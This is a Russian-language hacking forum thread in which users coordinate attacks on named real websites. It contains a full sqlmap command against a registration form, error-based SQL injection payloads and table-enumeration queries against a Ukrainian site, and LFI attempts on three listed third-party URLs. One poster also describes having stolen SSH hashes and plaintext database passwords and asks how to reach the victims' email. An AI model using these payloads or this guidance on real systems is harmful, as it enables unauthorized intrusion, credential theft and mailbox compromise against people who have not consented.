Хорошо,уже что-то... А какой из параметров? first_name? у меня ручками не получается... (';+UNION+SELECT+error-based & etc). А вообще я запускал софтину с ключем --parse-errors. А это значит,что он должен был мне показать саму ошибку,так? Или нужно было включить траффик-лог?
Вообще то в работе пишут какой параметр injectable. Почитал твой последний лог - у тебя там вообще не описан URL. Отсюда вывод, что либо он имеет вид url/?param=123 или url/param/123 и SQLMap автоматом атакует последний и единственный параметр.
http://sub.adomain.ru/users/register/ т.е. он долбит по "register"... Нежиданно.... Мне казалось,что изначально он прогоняет data-параметры (те,что постом идут)
python /CMS/sqlmap-master/sqlmap.py -u "http://sub.adomain.ru/users/register/ " --data="first_name=aaa&last_name=aaa&email=[email protected]&password_1=asdasd&password_2=asdasd&country=none&city=ffff&phone_number=%2B894613216516&traffic_source_types[]=interesting&traffic_desc=ddddd&spec=register&_q=1" -f --random-agent --banner --parse-errors --all --risk=3 --level=5 --batch --dump-format=HTML --output-dir='/var/www/../' -t '/var/www/../traff.txt' > '/var/www/../log.txt' В общем,если есть возможность и желание,то прошу помощи,т.к. сам не смог разобраться log: http://rghost.ru/private/6LHmtr2tj/45ef36d7704be9bf4bc49b6bd2f9c241 traff: http://rghost.ru/private/8tx2bwB6Y/a1446f5dad951f089afa935d0ea42365 Пробовал сделать поиск по файлу траффика(т.к. БД была определена Oracle=> ошибки искал,как ORA-*) результата нет. Да и вообще там нет ошибок,как мне кажется
Есть доступ ко всем файлам на сервере, вытащила ssh хэши, пароли SQL в чистом виде. в общем, это здорово, но мне нужен доступ к их почтам. Не подскажете, где могут быть конфиги? EDIT: они юзают horde webmail=>/etc/psa/.webmail.shadow верно? Но этот файл закрыт на чтение root only FUCK. Неужели нет никаких более способов? Неужели я потратила целый день за зря ? ну таааааааааааааак обидно, сил нет
SquirrelMail 1.4.21 - есть ли уязвимости? Погуглил - информация о наличии уязвимостей есть,но нет эксплойтов... + ISPmanager v4 lite. Есть ли что-то? (кроме открытой передачи пароля в API)
http://www.techexpo.kiev.ua/info_pa...ogin,4 from eebcnet_techexpo.users--&sub_id=1 помогите не могу раскрутить
http://www.techexpo.kiev.ua/info_page.php?id=-37 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY MID(VERSION(), FLOOR(RAND(0)*2), 64)) - версия БД. ( это если ручками хочешь перебирать,а так: sqlmap сказал,что [WARNING] no table(s) found. Но он пиздит 100%,там самому надо перебирать(SELECT table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema = 'DB') )
Там нету такой таблицы http://www.techexpo.kiev.ua/info_pa...656562636e65745f746563686578706f--+k&sub_id=1 eebc.cms_users
http://www.techexpo.kiev.ua/info_pa...e,4 from information_schema.tables--&sub_id=1 но, information_schema показывает что она существует
таким запросом вы увидите список всех таблиц из всех доступных бд. чтобы узнать таблицы из конкретной бд используйте where
xxl , если хотите, чтобы Вам помогли, то нужно задавать корректный и внятный вопрос, а еще лучше, опубликовать ссылку на язвимый сайт. Читайте правила! Если не отредактируете, пост будет удален.
Парни, подскажите, можно тут раскрутить php LFI: https://autopaymentfinder.com/dealers/index.php?p=ll http://yll.cce.tw/mastersys.php?mode=cent http://svadesi.com/tagsdb/actor_page.php?lang=jj&tag=lucky ali
Пробовал читать /proc/self/environ но там вроде как инклуд патх везде не дает лазить далее файлов на самом сайте. Нулл байт пробовал. Слешдотов должно быть именно 4096? Какой предел?
Сделал. Просто мне казалось,что есть какое-то универсальное решение в случаях,когда мап так ругается.
